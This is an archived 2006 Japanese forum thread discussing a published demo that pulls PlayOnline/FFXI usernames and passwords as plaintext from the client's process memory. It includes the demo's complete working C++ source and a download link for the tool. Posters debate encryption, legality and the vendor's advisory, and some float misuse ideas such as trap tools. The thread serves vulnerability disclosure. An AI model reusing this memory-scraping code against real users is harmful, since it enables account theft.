PlayOnlineのパスワードぶっこ抜きデモが公開

FF11の板（壺）の便利なツール・ソフトを作るスレ Ver.7で
PlayOnlineのパスワードぶっこ抜きデモがソース付で公開された。
http://yy10.kakiko.com/test/read.cgi/ff11/1156767706/269

http://www.uploda.net/cgi/uploader4/index.php?dlpas_id=0000006286.zip
DLパスワード ff11

以下Readme.txtより
PlayOnlineのパスワードぶっこ抜きデモです。
ログインした状態でPassHacker.exeを実行して下さい。
たった数十行のコードでパスワードを抜かれてしまうセキュリティの甘さ。
これが(おそらくサービス開始当初から)放置され続けていた事実を、あなたはどう思いますか？

! このプログラムはセキュリティ上の危険性を知らせるためのデモであり、
! 罠ツール等作成の手助けをするものではありません。
! 当パッケージから得た情報を元に悪質なプログラムを作成しないで下さい。
! 実行ファイルは付属のソースをVC++2005でコンパイルしたものです。
! 当然ですが、取得した情報を外部に送信するような処理は一切書いていません。

俺のPCはネットに繋げてないから安心

よん？

>>1

>>1　おい！これ使ったら俺のキャラを誰かが勝手に使ってるぞ！！！

パソコンが射精した

　　 /.　　　ノ、i.|i　　　　　､、　　　　　　　　　ヽ
　　i　　　 | ﾐ.＼ヾヽ､＿＿_ヾヽヾ　　　　　　　 |
　　|　　　i　､ヽ_ヽ､_i　 , /　`__,;―'彡-i　　　　 |
　　i　　,'i/　`,ﾆ＝ﾐ`-､ヾ三''―-―'　/　　　　.|
　　　iｲ | |' ;'(( 　 ,;/　'~ ゛　 ￣`;)" c ﾐ　　　　 i.
　　　.i　i.| ' ,||　 i| ._　_-i　　　　||:i　　　| ｒ-､ 　ヽ、　　　／　 　 ／　　 /　　|　＿|＿　―　/／￣7l l ＿|＿
　　 丿　`|　((　　_゛_i__`'　　　　(( ;　　 ﾉ//　i　|ヽi.　_／|　　_／|　 　 /　 　|　　｜　 ―　/　＼/　　 　｜　　―――
　 /　　 　i　||　 i` - -､` i　 　 ﾉﾉ　　'i /ヽ |　ヽ 　　　　|　　　　|　　/　　 　| 　 丿　＿／　　／　　 　 丿
　 'ﾉ　　..　i )) 　'--､＿`7　　 ((　　　, 'i ﾉノ　　ヽ
　ノ　　　　 Y　　`--　 " 　　　))　　ﾉ ""i　　　　ヽ
　　　　　　ﾉヽ､　　　　　　　ﾉﾉ　　_/　　 i　　　　　＼
　　　　　/ヽ　ヽヽ､＿＿_,;//--'";;"　　,/ヽ、　　　 ヾヽ

>>2
次回接続時に自動送信

>>8
次回も何もネットに繋げてないから

コンパイル→ぷよぷよ→カーバンクル

召喚強化の流れは既に出来上がっていたということだったんだよ！！

// PassHacker.cpp : コンソール アプリケーションのエントリ ポイントを定義します。
//

#include "stdafx.h"
#include <windows.h>

int _tmain(int argc, _TCHAR* argv[])
{
const wchar_t *lpszWindowName = L"PlayOnline Viewer Ver.1.17.02h";

HWND hPlayOnlineWindow = ::FindWindowW(NULL, lpszWindowName);

DWORD dwPlayOnlineProcessId = NULL;

::GetWindowThreadProcessId(hPlayOnlineWindow, &dwPlayOnlineProcessId);

HANDLE hPlayOnlineProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPlayOnlineProcessId);

if(hPlayOnlineProcess)
{

シナチクに利用されるだけだな

wchar_t szUsername[16] = {0};
wchar_t szPassword[16] = {0};

::ReadProcessMemory(hPlayOnlineProcess, (LPCVOID)0x00127A62, szUsername, 15 * sizeof(wchar_t), NULL);
::ReadProcessMemory(hPlayOnlineProcess, (LPCVOID)0x001299E8, szPassword, 15 * sizeof(wchar_t), NULL);

::wprintf(L"user: %s\npass: %s\n\n", szUsername, szPassword);
::CloseHandle(hPlayOnlineProcess);

wchar_t dummy;
::wprintf(L"press enter to exit.");
::wscanf_s(L"%c", &dummy);
}

return 0;
}

これだけで抜けちゃうのかよ…

セキュリティ甘すぎｗｗｗｗｗｗｗ

ありゃ入力直下で暗号化処理してないの？

メモリ上に平文のまま展開してるらしい

266 名前：(･ω･)[sage] 投稿日：06/10/04(水) 13:22:50 ID:vs8maoiW
ログ処理を暗号化とか考える前に、まずはメモリ上に平文のパスワード置くの止めろと(´Д`)

>>1は勿論□ｅにも報告したんだよな？

学生でも作れそうな捨てっぷ数だな

>>15

鯖との認証は平文だし
Radius認証、PAPだけでやっているんじゃないかｗ

まぁ、今までオフゲ作ってた会社だからな･･･
セキュリティとかのノウハウは０に等しいんだろ

http://www.playonline.com/ff11/event/tgs2006/vanafes3.html#enqt
開始予定日時：　10月4日(水) 14:00頃
終了予定日時：　10月5日(木) 14:00頃

ヴァナフェスアンケートを実施中ですが
その中に言語別サーバーに関する項目があります。
公式のアンケートなので要望が高ければ実現するかも？

※参加方法：POLにログイン→FFXIトップページからヴァナフェスアンケートへ

・ゲームやサービスに望むことは何ですか？
□サーバーを言語別に分けてほしい。
↑にチェックを入れ、他のアンケート項目に答えて最下段の確認を押せば登録完了です。
POLで登録出来るので課金してない人も参加してみてはいかがでしょうか？
あのヴァナが日本語で溢れる世界をもう一度！

全てのパーティに晒しがつきまとうあの頃をもう一度、か

マジ？

>>21
スレ違い

>>11
なんじゃこの難しいプログラムは
Ｃ言語の成績Ａ評価のおれが見てもさっぱりわからん

法律よく知らないけどセキュリティが甘いとしても
そのハッキング方法をネット公開したらタイーホされね？
そのアプリ公開したヤツとここにソースをコピペしたヤツ。

方法公開まではセーフ？

セキュリティの不備を指摘するためにハッキングして逮捕された人いたな

> メモリ上に平文のまま展開してるらしい

('ｘ'*)・・・

当時はトロイ・ウィルスの類は想定しなかったてことだね。

というか、とっくに直してるもんだと思ってたぞ。
これってかなり前に分かってた事よな。
■eのネ実担当なにしてんの？
ちゃんと報告しないとクビとぶよ？

平文でメモリに置きっぱなしにしてるのか？
ハック難易度最低ランクだなそりゃ

パスワード抜くツール入れて、パスワード抜かれました、って、
お前らアホ？

>>25
WindowsのAPIを呼び出してるだけなので難しいプログラムじゃないよ。

http://www.playonline.com/ff11/event/tgs2006/vanafes3.html#enqt
開始予定日時：　10月4日(水) 14:00頃
終了予定日時：　10月5日(木) 14:00頃

ヴァナフェスアンケートを実施中ですが
その中に言語別サーバーに関する項目があります。
公式のアンケートなので要望が高ければ実現するかも？

※参加方法：POLにログイン→FFXIトップページからヴァナフェスアンケートへ

・ゲームやサービスに望むことは何ですか？
□サーバーを言語別に分けてほしい。
↑にチェックを入れ、他のアンケート項目に答えて最下段の確認を押せば登録完了です。
POLで登録出来るので課金してない人も参加してみてはいかがでしょうか？
あのヴァナが日本語で溢れる世界をもう一度！

>>31
お前は予防接種にいって病気になって帰ってきそうだな

>>31
ソースの方はパスワードとって表示する処理しか書いてないよ。
手元にコンパイラがないからバイナリ比較できないのでexeは知らん。

>>34
病院でウイルス注射して貰ったらウイルスに感染した！
って言ってるお前らが謎なんだが
真性の馬鹿？

>>36
>>1がどんな物かわからないヤツは会話に参加するなよ小僧

>>2+0DkbNJ

これはひどい

>>36
病院行けｗ

>>11-13

お前何やってんだよ！！！
このすれ見た奴ら全員パスワード抜かれるぞ！！！

PS2でやってるから抜かれる心配はなす

今まであった罠ツールにこれを組み込んで
シャウトで自分のIDとパスワードを叫ばせることができるツールが
簡単に出来る

とりあえずはツールを使わないことが対策だが
将来的にブラウザなどの脆弱性を利用されて
これを組み込んだプログラムが実行させられる可能性があるのが問題

>>36
中華に、このセキュリティの甘さを突かれる
パス抜きツールを本格的に作ってばらまかれる前に対処しろって
実際にデモ作って検証してるだけだろう

JavaスクリプトやVBScriptで>>11 >>13みたいなことはできる？

ツール使う前提でメモリ見せるなら
平文だろうが暗号化してようがパス抜かれるだろ。アホ？

アンチウイルスの警告無視してウイルス実行するのと同じなんだが
マジで見てて恥ずかしいくらいだｗ

>>44
ローカルならＷＳＨ経由で出来る
ネットからはセキュリティホールでも突かない限り実行できんが

ツールの作りやすさが違う

Cコーデックできるし、俺も脆弱探してみるかな。
それにしてもこんなステップ数でできるのかｗ

>>45が本物だって事はわかった

>>47
暗号文送ってから解析しても良いから手間は同じ
つかキー入力直接吸えばいいだけじゃん
ウイルス実行して感染した！とかアホとしか

>>46
じゃあ少しは安心か（・ω・）

http://www.playonline.com/ff11/event/tgs2006/vanafes3.html#enqt
開始予定日時：　10月4日(水) 14:00頃
終了予定日時：　10月5日(木) 14:00頃

ヴァナフェスアンケートを実施中ですが
その中に言語別サーバーに関する項目があります。
公式のアンケートなので要望が高ければ実現するかも？

※参加方法：POLにログイン→FFXIトップページからヴァナフェスアンケートへ

・ゲームやサービスに望むことは何ですか？
□サーバーを言語別に分けてほしい。
↑にチェックを入れ、他のアンケート項目に答えて最下段の確認を押せば登録完了です。
POLで登録出来るので課金してない人も参加してみてはいかがでしょうか？
あのヴァナが日本語で溢れる世界をもう一度！

>>1のプログラムって、ただユーザーネームとパス抜いて表示させるだけだよね？

>暗号文送ってから解析しても良いから手間は同じ
だから暗号化しないってのは常識を疑うねって話じゃね

平文でメモリに置いてるってジラの頃から言われてたよな

>>36
C型肝炎でぐぐれ

>>53
うむ、pol.exeのメモリ空間からIDとパスを拾って表示してるだけ
ソースを見る限りではな

ま、俺も>>45>>50が正論だとは思うが、修正しなきゃならないかもなー開発ちーむｗも余計な手間が増えたんじゃないの？

平文で入ってるんだったら他のデータもそのまんま入ってるんだろうから、
アクション起こす毎にプロセスメモリダンプしてったら丸裸にされる勢いだね。
ここまでとはおもわなかったよ。
そりゃツールを誰でも作れるわけだｗ
Windowsのプロセスを少しでもかじった事のある人間なら
誰でもツール作れるんじゃないの？

つーかよく今までこれを利用した罠シャウトが出なかったもんだな・・・

ID:2+0DkbNJは>>1のファイルを実行した人の話をしてるようだ

>>56
だよねー
何かウィルスだウィルスだって騒いでる人いるから、ちょっと不安になったｗｗ

>>59
リアルで捕まるからｗｗｗｗｗ

>>61
騒いでるのは釣り以外一人だけだけどなｗ

>>57
携帯から自演乙ｗ

知識の無い奴からすりゃ「ウィルス」ってのは魔法の言葉でさ
それ使えば説明できてると勘違いしてるだけなんだから
そうガミガミしてやんなよ

>>61
ぶっこぬかれたとか勝手に動いてるとか言ってる連中が
本当にぶっこぬかれてたらそれはそれで驚きだ

>>62
シャウトされたパスを使って不正アクセスした奴はアウトだけど
ツール作った奴もアウトなのか？

>>64
スマン、携帯からでもないし自演でもないぞ
アンカーミスか

>>68

>>67
一応外部ツールではある罠
banかどうかは□の判断だが

>>67
なるんじゃないか？パスワードって時点でヤバイし、
それを他人に使わせるよう仕向けたようなもんだから。

パスワード忘れたときに便利だな
メールのパスワードも抜けないかな？
忘れたからPOLのメール読めないんだよ

ああ、これにあたるな
セキュリティ用語事典[不正アクセス禁止法]
http://www.atmarkit.co.jp/aig/02security/unlawfulaccess.html

また特定のアクセス制御を有する端末に関しての、認証情報（ID・パスワードなど）をその
端末利用者や管理者以外の人間に漏らしたり流布してはいけない、ということも規定され
ており、これは「不正アクセスを助長する行為」として犯罪とされ、本法により罰せられる。　
この場合の刑は30万円以下の罰金刑である。

>>72

サポートに電話すれば教えてくれるよ

まあどうでもいいけど、これは早く直して欲しいね
ここで迅速に修正したらちょっとは株上がるかもよ＞■

ジラート時点で判明してるのに(本来なら開発段階で潰してて当然)
今更ネ実で晒されてから迅速に対処して株が上がるって面白い発言ですね

脆弱性を自らネ実で公開
→即時対応
→■＜タスクチームの威力です

・・・マッチポンプ？

PS2って勝ち組じゃね？

試しに動かしてみたら本当に表示されたのでage

キー入力をそのまま出力するツールがあれば（あるが）、
「IDからPASSまで全て丸裸！Windowsの脆弱性だ！」とか言うの？お前ら
真面目にこのレベルの話なんだが

そもそも簡単にプロセス境界をまたげるのが問題なんだよな
そんな必要あるのデバッガかハックツールぐらいなもんじゃん

おｋ、無駄(?)な改行入れて36行ほどでPOLのIDとpass抜けるってMMO研究所に書いてくる。

　　 /.　　　ノ、i.|i　　　　　､、　　　　　　　　　ヽ　　
　　i　　　 | ﾐ.＼ヾヽ､＿＿_ヾヽヾ　　　　　　　 | 　　　|　| |　　　|　　　￣￣｜|.　‐┬‐
　　|　　　i　､ヽ_ヽ､_i　 , /　`__,;―'彡-i　　　　 |　　　 |＼　　|￣￣|　￣|.￣　　―┼―
　　i　　,'i/　`,ﾆ＝ﾐ`-､ヾ三''―-―'　/　　　　.|.　　　 l　　　　　 ／　　/　　　　　　|＿
　　　iｲ | |' ;'(( 　 ,;/　'~ ゛　 ￣`;)" c ﾐ　　　　 i.　　　
　　　.i　i.| ' ,||　 i| ._　_-i　　　　||:i　　　| ｒ-､ 　ヽ、　　　／　 　 ／　　 /　　|　＿|＿　―　/／￣7l l ＿|＿
　　 丿　`|　((　　_゛_i__`'　　　　(( ;　　 ﾉ//　i　|ヽi.　_／|　　_／|　 　 /　 　|　　｜　 ―　/　＼/　　 　｜　　―――
　 /　　 　i　||　 i` - -､` i　 　 ﾉﾉ　　'i /ヽ |　ヽ 　　　　|　　　　|　　/　　 　| 　 丿　＿／　　／　　 　 丿
　 'ﾉ　　..　i )) 　'--､＿`7　　 ((　　　, 'i ﾉノ　　ヽ
　ノ　　　　 Y　　`--　 " 　　　))　　ﾉ ""i　　　　ヽ
　　　　　　ﾉヽ､　　　　　　　ﾉﾉ　　_/　　 i　　　　　＼
　　　　　/ヽ　ヽヽ､＿＿_,;//--'";;"　　,/ヽ、　　　 ヾヽ

>>80
良く分からないけどPOLに覚えさせてるのをキー入力を必要とせずに抜けるんじゃないの?

>>84
当たり前だろ
PCに記憶させてんだから
認証するにはメモリーに展開するわ
暗号化したらどうなるってわけでも無いんだが
PAR使えばチートできるのと原理は同じ

ネ実って結構頭いい奴多いんだな、俺にはなんの事かさっぱりだ

>>85
暗号化させてたらどうにかなるんじゃないの？

268 名前：(･ω･)[sage] 投稿日：06/10/04(水) 15:08:38 ID:UqUNobG1
ログを暗号化しても、復号する関数をhookすればいいんですが。

ID:2+0DkbNJ とまともに話せないと思ったほうがよさげ？

付箋紙にパスワード書いてモニタに貼っておくようなもんじゃないかね
近づかなきゃ見えないとはいえ、見ようと思えば周囲の人間からもバッチリ見える
いくらなんでも無用心すぎるから、せめて机にしまわないか？っていう

ID:2+0DkbNJ

>>ID:2+0DkbNJ
>>88

結局、このスレ何がしたいのか分からん

DWORDにNULLいれんのが気にいらねえええええええええええええええええええええええええええええ

まだ直してなかったのかよ、この不具合

こんなことより>>1よ聞いてくれ。
ヴァナフェスのアンケートしてるんだけどさぁ・・・
あなたが所持してるLS数の選択があるんだよ。

でもな、　所　持　し　て　い　な　い

の項目がないんだよ。
無視してすすめると、最後に↑の選択ができてません、ってでて
アンケート終了できないんだよ。
オレはどうすればいい？

N U L L - P O

なにこの逮捕者続出しそうな糞スレは

たくさん逮捕されるといいですね＾＾＾＾＾＾＾＾＾＾＾＾＾

>>86
安心しろ、少なくともここはアホばっかだ

>>96
嘘ついて１とか書いとけばいいんじゃね？
どーせわからんよ

POLのバージョンアップでオフセットがずれるとそのままでは動かなくなるだろうけど、
いたちごっこだろうなぁ。
メモリからとってきてるので、ログインしていることが条件になってるんだな。ファイルか
レジストリにも記憶してるはずだけど、そっちはいまのとこ解析されてないのかな？
まあ時間の問題のような気がするが

誰か民明書房的に説明してくれ

>>96
一人LS作ればいいじゃない

>>43
かなり前から中華が罠サイトでやってる。
前にもあったろ？なんとかの雫とかいうサイトにアクセスするとWindowsのセキュ穴使って
コード送り込んで、POLの垢とパスを特定サイトに送りつけるって事件が。

いまあっちこっちでツール配布の振りして中華サイトのexeファイル直リン張ってるのがいるが、
それも同様の罠が入ってる可能性が非常に高い。

>>104
にもかかわらず◇eはPoL狙い撃ちされてます、って言うのを公表してないんだよね。
本当に糞ったれな企業だよ、まったく。

一番危ないのが例のAH検索サイトとFFレシピ

■e<ユーザーがパス抜かれようが知ったこっちゃない

>>103
奇才あらわる
その考えは思いつかんかった

>>96
後で嘘にならないように一人LS作った

神！
自分のパス忘れて新しくパソコンでＦＦ出来なく
しょうがなく古いパス記憶してある方の低性能パソコン使ってたけど、このツールでパスわかったｗｗｗ
やっと高性能パソコンに移行できるぜ

ありがとう！このツール作った人！

FFRecipeはRMT会社に買われたからな。
いつやられるかまじやヴぁい

>>88
あのなあ、復号をサーバでやればいいだけの話だろ？
アホか？

>>112
馬鹿？
ならその暗号をそのままサーバに渡すだけ。

PCの中自由に見られる時点で終わってるの。わかる？

例え他人のパスわかっても不正アクセスとして捕まるんじゃねーか？

匿名プロキシ通してアクセスできるツールもあるのかもしれんが、
絶対に足はつくだろう。

でもさ、よく考えたらPOL起動した状態で外部プログラムを起動する状況って無いよな？
真っ当なプレイヤーなら、POL起動してそのまますぐFF起動するんじゃね？
ブッコ抜きプログラムはPOLより先に起動してたら抜けないだろ。
心配する必要があるのは窓化してる人だけだろ。

これよりも、レジストリから盗むタイプのが何倍も危険だと思うが。

>>114
>例え他人のパスわかっても不正アクセスとして捕まるんじゃねーか？
当たり前だろ。

今回のツールはメモリ上のものを表示するだけのツールだから、
ぶっちゃけ何がしたいのか、 何が凄いのか、
全くわからないけどな。

他人がそのファイルを実行してくれるなら、
どんなウイルスだろうが仕込めるに決まってるだろ。

>>113
ええと、複合化の鍵をPC固有のものにすれば、盗まれても関係ないと
思うのですが？
何か間違ってます？

>>115
PC起動〜POL起動の間の時点で外部プログラムが勝手にこっそり起動してたらどーすんの？

>>114
中国からの不正アクセスじゃ日本の警察には捕まらねえけどなｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

>>111
買った先がRMT会社のソースきぼん。ちょっと某ブログ更新してくる。

>>117
前提としてPCの中身が自由に触れるんだから、
そのPCのキーだって取り出せるし、
普段のキー入力を全て保存しておいて後で解析してもいい。

「ウイルスを実行したらパスが抜けた！」って言ってる奴多いけど。


　　　当　　　た　　　り　　　前

わかりますか？

このテのスレの「地雷踏んだら爆発した！」発言のうちで実際踏んだ奴ってどんくらいいるんだろ

つーか他人のPCに自由にツールが仕込めて、
それを馬鹿みたいに実効してくれるなら、

FF起動からの一連の動作をマクロ化したツールでも仕込めばいいじゃん。
何でもアリだ。

>>121
いや、複合化鍵は盗まれてもかまわない。
どうやってその複合化鍵を生成するルーチンを解析するんだい？
PC固有のものだからほかのPCから送信しても無理なように作るぞ？

>>124
公開鍵暗号みたいなもの全てに仕込んでもいいけどよ。
それ以前に全てが自由に触れるだろ？
そもそもプラットフォームに寄らずIDとパスだけで遊べるゲームなのよ。
わかりますか？
わかんねーかな。

アホ。

>>120
ffrecipeサイト売却か??
ttp://jbbs.livedoor.jp/bbs/read.cgi/game/6954/1150873573/

もっと詳しくはネ実に立っていたスレの方がいいんだが、言うまでもなくもう落ちてる
>>120がffrecipe売却まとめサイトの中の人ならそれ以上に新しい情報は無いよ

>>125
全てが自由に触れるだろうというのは果たしてどうだろう。
まあ、今の作りがお粗末なだけで、ちゃんと考えて作れば
少々のことIDとPASSがだだ漏れにはならないとは思うが。

>>127
駄々漏れも何も、最初から他人には見えない情報だ。
「これが他人に実行されたら！」なんてのは、
その他人に実行される環境の問題だし、
それが成立する前提ならPCの中でやれないことは何も無い。

暗号化したらどうなるんだよ。
全く何の対策にもならず、全く無意味な手間が増えるだけだ。
銀行の貸し金庫の中のものを更に金庫に入れて、
さらにその中の金庫に隠して意味があるかって話。

普段は手間が増えるだけだし。
金庫そのものを盗まれたら全く無意味。

>>126
売却の話は知ってたけど買ったのはそこなのかー。ちなみに俺は例のアンチRMTの人。
今まで触れたのはあくまでゲーム内の事だけだが、これは書く価値ありそう。

馬鹿はどれだけ対策しても、洩らす時は洩らすからな。
あとは対策コストに見合うだけの効果を得られるかどうかだな。
そもそもネットワークに繋がっているという事はそれだけのリスクが常にあるという事。

>>128
暗号化は手間が増えると言っても、プログラム的に手間が少々増えるだけで
ユーザには全く影響のないこと。
仮に金庫の中にお宝の地図が入っていたとして、それが99..999999999999%の
確率で開けられないものであれば、盗んだ奴は中身が見れないわけで、
盗まれてもあまり意味はないのではないかな？

>>131
アホか。ループさせんな。
サーバに暗号化されたまま送るならそのままでいいし、
内部的に復号させるならen/decrypt処理をnopするだけだ。

そもそも99.999999999999%って。
暗号ですらねえよこの程度。

ffrecipe売却まとめサイト
http://ffrecipe.jugem.jp/

素人は黙ってろや

>>132
nopって。それでできたら、全てのセキュリティは無意味ということになりませんか？
あと９９％云々はあくまでもたとえでいっただけですので。
AES並の暗号強度とかいってみたほうがよかったですか？

もちろん暗号化は必要だが、このツールに関して言えば、
認証終わったらメモリから消せやｺﾞﾙｧという話のような・・・

>>132
あと、サーバに暗号化されたものを送る場合、その暗号化されたもの
を盗めたとして、それを別のマシンから送信した場合に無駄にするよう
に作ればいいだけなのですよ。
あくまでも、以前関わった仕事にそんなのがあったというのを思いだし
ながら書いてるだけなので、暗号とかに関しては素人に近いです。ハイ

とりあえず、夜も遅いので今日のところはこれぐらいでZzzz

お前らちょっとPOLみてこい
おもしれーことになってるから

http://www.playonline.com/ff11/polnews/news8674.shtml

流石にお早いことでｗｗｗｗｗｗｗｗｗｗｗｗｗ

＞本日、技術チームの調査により、不正なプログラムの使用によって、
＞プレイオンラインIDおよびパスワードを盗用できる可能性が不具合として確認されました。

技術チームの調査は掲示板を見ることですか？

対策が施されるまではPCでログインしない方が良さそうね。

おもすれー＾＾

夜中の3時にうぷとは流石にヤバイと踏んだか。
対応早くて頑張ってるんじゃね？




何年も気がつかなかったのはマヌケだが。

作るスレの作者はGJってことか？

ジョブチェン祭り以来の反応速度じゃね？ｗ

対応早すぎだぞ

さすがに気づいてるだろｗ
面倒なのと、あまり表沙汰にならなかったから放置してただけでｗ

>本日、技術チームの調査により
>本日、技術チームの調査により
>本日、技術チームの調査により

すげー　堂々と嘘書いてるｗ

良かったな、お前ら

技　術　チ　ー　ム　

に格上げらしいぞ

技術チーム＝ネ実民

なるほど　それなら嘘じゃないｗ

うそは書いていないな
(掲示板に投稿されていたネタを)調査して(事実として)確認したわけだし。

昨日、ネ実民チームの調査により、不正なプログラムの使用によって、プレイオンラインIDおよびパスワードを盗用できる可能性が不具合として確認されました。

◆eとネ実民の連携プレイだな

絆か

>>149
やったー＾＾

って　ﾃﾗﾜﾛｽ　ｗｗｗ

つかまだ対策してなかったのかこれ…

>>153
FF11の板（壺）便利なツール・ソフトを作るスレ Ver.7の人たちは無視ですか。

□e社内
17:10
なんだこれ？かなりやばげ？報告しとくか。
17：20
はーぁ？！ネ実の情報?ハイハイ開発に見せとくわー
20:00
流石にそろそろ帰るか。ん？あー忘れてた。開発にでも届けとくか。
20:15
あーはいはい、報告の類はそこに置いといてください。暗黒ファビョリすぎオモスレー
22:00
流石に飽きた。帰るか。っとその前に・・・・なんじゃこりゃぁぁぁ！！
23:00
こんな時間に呼び出すなヴォケ。で？なに
ネ実の情報?確認したの?
まだでしたｗ
さっさとやれ
24:00
w背dｒｆｔｇｙふじこ；ｐ：＠「」

現在に至る

昨日、技術チームの調査により

に修正されてるぞ

1 ：既にその名前は使われています ：【2006/10/04(水) 17:10:12.64 ID:6uGDsr3/】
FF11の板（壺）の便利なツール・ソフトを作るスレ Ver.7で
PlayOnlineのパスワードぶっこ抜きデモがソース付で公開された。
http://yy10.kakiko.com/test/read.cgi/ff11/1156767706/269
　　　　
　　↓　　　↓　　　↓　　　↓
2006.10.05(木) 03:00 From: プレイオンライン
不正なプログラムにはご注意ください(10/5)

昨日、ネ実民チームの調査により、不正なプログラムの使用によって、プレイオンラインIDおよびパスワードを盗用できる可能性が不具合として確認されました。

絶対見てるよな？◆eｗｗｗｗｗｗｗｗｗｗｗｗ市ねｗｗｗｗｗｗｗｗｗｗｗｗｗ

■e<見てなかったらこんなに早く対処できませんよ＾＾；；

でもさー、「不正なプログラム」って表現ちょっとおかしくね？
規約違反ツールに限定されているみたいな印象を受けるぞ。俺だけかもしんないけど。
この場合「悪意のあるプログラム」のほうがしっくりくる希ガス。

ふ‐ぐあい【不具合】
[名・形動]状態・調子がよくないこと。また、そのさま。「―な箇所を直す」

>本日、技術チームの調査により 　>本日、技術チームの調査により 　>本日、技術チームの調査により
>本日、技術チームの調査により 　>本日、技術チームの調査により 　>本日、技術チームの調査により
>本日、技術チームの調査により 　>本日、技術チームの調査により 　>本日、技術チームの調査により
>本日、技術チームの調査により 　>本日、技術チームの調査により 　>本日、技術チームの調査により

メモリにパスワードが存在することはアーガススレ等で何度も話題になっていたわけで
Windows版が発売された4年前からの仕様だろうし□eも放置を決め込んでいたようだが
実働コードが配布された途端に慌てて不具合不具合言い出してるのが非常に愉快

かのう‐せい【可能性】
１ 物事が実現できる見込み。「成功の―が高い」２ 事実がそうである見込み。「生存している―もある」３ 潜在的な発展性。「無限の―を秘める」４ 認識論で、ある命題が論理的に矛盾を含んでいないという側面を...

怠慢がばれたら大慌てで取り繕ってやんの
どこまでユーザーなめてんだ、この会社

田中「ねえねえ担当くん」
担当「なんですか。新アビのバランス調整でみんな忙しいんですけど」
田中「ネ実に面白いスレが立ってるよ」
担当「（あんたネットしてるんですか。）…どれですか」
田中「この『たまたま殺したロランのグーブーがダリア落とした』ってスレ。
　　　最初は駄スレだったんだけど、途中から良ネタや神絵師さんが光臨してすごいんだよ」
担当「どんだけハマってんですか！仕事しないならもう帰ってください！」
田中「うーん、面白いのになあ」
担当「…全く。ん？（その下の『PlayOnlineのパスワードぶっこ抜きデモが公開』スレに目を止める）
　　　…………た、た、大変だ！すぐに開発チームに連絡！主任クラスを集めろ！」
田中「役にたったようで嬉しい＾＾」

ネ実のほうがこういう情報は早いんだよなｗ

挙げ

あれ？今日から昨日に変更されてるんだけどｗ

独断と偏見による年表
http://ff11wiki.rdy.jp/-1223511864.html

追記してみた。　
技術チームのくだりとか、
今日、技術チームの　→　昨日、技術チームの
に書き換わってる点については触れていないので補足したいかたはどうぞ

>>171
ちょｗｗｗｗｗマジかよｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
それはやっちゃいけねえだろｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

２４パート４がやってなかったら社員は寝てて気づかなかっただろうな

まぁ昨日の17時だからまちがっちゃいねぇわなw
これで一昨日にしたら笑えるがwwww

>>77
当たりすぎだろｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

いままでチートに関連するスレでなんども話題にでて、
メールでも何度も修正要望だしたのに無視決め込んでたのに
ネ実に出したとたん、不具合が見つかりましたか。
ずいぶんと良い商売ですね。
不具合じゃなくてそう設計しただけだろ。

ソースが出て誰でも簡単に抜けるようになったから驚いたんでしょうね。

チートのコードとか出したらどんな対応してくれるのかwktk

アーガスとかコード出てるのに対策してくんねーな。

いままでｎｙでユーザー情報流出とか顧客情報転売とか起こってないのは奇跡に近いな

金曜の対策はウィンドタイトルかえるだけだろ？ｗｗ

>>11 の
const wchar_t *lpszWindowName = L"PlayOnline Viewer Ver.1.17.02h";
を変えるだけで通用しそうだｗｗ

クソﾜﾛﾀｗｗｗ
対策早すぎｗｗｗｗｗ

流石に今までのチートツールで学習してるだろう。
いや、しかし・・・連中のことだから・・・。
ホントにそういう対策してきたら退会するわ。いい機会なので。

>>26
類似するケースで判例あるのかな？
もしあったとしても、判断は個別具体的だからな
どーなんだろね
学術的とか、知的好奇心とか、、啓発とか
コメント入れててもダメな時はダメっぽいけどｗ

技術チームの調査　＝　ネ実

>>182
アドレス位置もずらすでしょう。
応急処置なので暗号化は無し。

簡単でもいいから暗号化と、メモリの動的な確保ぐらいはやっておきたい。

しらなかった
おれたちゃ□eの技術チーム及び調査部隊だったのか

ﾊｹﾞﾜﾗ
スパジャン祭りのときもそうだったが
ほんとに朝から晩までネ実べったりなんだな

｢ゲームメーカーはこれまで、ソフトの開発時に膨大なコストをかけて
デバッグ(バグを発見し、取り除く作業)をやってきたが、
（プレイヤーにデバッグさせれば）このコストが軽減されるのではないか｣(和田氏)

毎日ネ実のリロードが仕事じゃあ糞スレも立てたくなるよな

>>186
技術チームの調査　＝　ネ実の閲覧

確かに一般的な業務とは違ってスペシャルタスクだな。
俺もネ実みて給料もらいたい。

今日のパッチで動かなくなるツールは
罠確定ってことじゃね？ｗ

そうでもない。

なんというか、間が抜けてるよなぁ。
デモと同じパス抜き(メモリから抜く)は中華が1年以上前に仕掛けた罠サイトで
実装していたし、おまけに当時の罠サイトはご丁寧にlogin_w.binも
ログイン画面のSSも併せて送信してたってのにな。
…オフセットとウィンドウ名変えるだけとかやめてくれよ?

>>26
別に問題ないんじゃね? セキュリティの脆弱性の確認として実証コード
(IEから電卓やメモ帳を起動するような無害なもの)を公開することは多い。

いきなり公開はどうよ? て見方も確かにあるんだけど、
たとえば「Microsoftがさっぱり対応しないから実証コードを公開した」というのも
結構あるわけで、去年の罠サイト「花の雫FF11情報局」で
同様の手法で中華に日に50アカウントとか抜かれていたにも関わらず
暗号化などの抜本的な対策が一切なされていなかった事実があり
こうでもしなけりゃ対応されなかったと思うよ。

要望なんか出したってコピペ返信だし。

>>197
中華がやるのは内部の人間が関係してるから放置してたんじゃね？意味は分かるな？
内部の人間と関係ない人間がツールに仕込み始めそうだったから対策。

>>199
それは脳みそ偏ってると思うぞ。
ROやLineageじゃあるまいし。

WoWのパス抜きトロイ(もちろん中国製)も持ってるけど
これも簡単に抜けるくさいなぁ。
…ネトゲトロイのコレクションが膨大になってきた。

上のプログラムを友達の家やネットカフェのFF用PCで実行すると面白い事になりそうだ。

>>202
わかってると思うけどやったら御用だからな。

なんでPC版出したんかねｗ

今回対応早いな〜最近本当に運営チーム頑張ってるね
ちょっと見直しちゃった

俺ら今度から技術チームって名乗るか

もう何年もの間放置されてた問題であることをお忘れなく。

しかし退社前の17:10にスレ立てるなんて、>>1もとんだ■社員殺しだな

つまり「技術チームの調査」にはネットで情報収集も含まれているんだな。
そしたらウソではなくなるわな・・・。

なんにせよSEに各クライアント一台ごとに別の公開鍵秘密鍵ペア用意するだけの必要性は
なかったってことかな。

